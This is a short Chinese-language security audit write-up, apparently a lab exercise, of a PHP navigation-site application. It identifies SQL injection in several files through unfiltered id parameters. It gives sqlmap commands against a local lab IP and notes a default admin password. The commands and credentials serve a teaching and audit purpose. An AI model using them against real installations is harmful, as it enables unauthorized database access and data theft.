一、前端代码审计 1.在site.php文件中,以get的方式传参id,并没有对id做任何过滤,当alias为空的时候,进行if语句之中,使用id的值直接进行sql查询。 2.在kali中输入:sqlmap -u "http://192.168.239.132/lanrenwzdh/site.php?id=1" -p "id" --flush-session --batch --random-agent,可以看到存在sql注入。 3.在wzshow.php文件中,可以看到以get的方式传参id,并没有对id做任何过滤,并直接使用传入的id进行查询。 4.在kali中输入:sqlmap -u "http://192.168.239.132/lanrenwzdh/wzshow.php?id=1" -p "id" --flush-session --batch --random-agent --dbs,可以看到有sql注入。 同理在/inc/love.php文件中也存在注入语句,是以post进行传参 二后端代码审计 1.在搭建网站时,使用的是默认用户与密码:admin:qqqqqq,登录进行之后发现信息泄露。 2.在/admin/edit_nav.php文件中,可以看到,以get的方式传递参数id,然后使用id的值进行查询,没有进行过滤,存在sql注入。 3.使用BurpSuite抓包,在kali中创建post.txt文件,将抓到的数据包保存到post.txt文件中,输入命令:sqlmap -r post.txt --random-agent --batch --flush-session。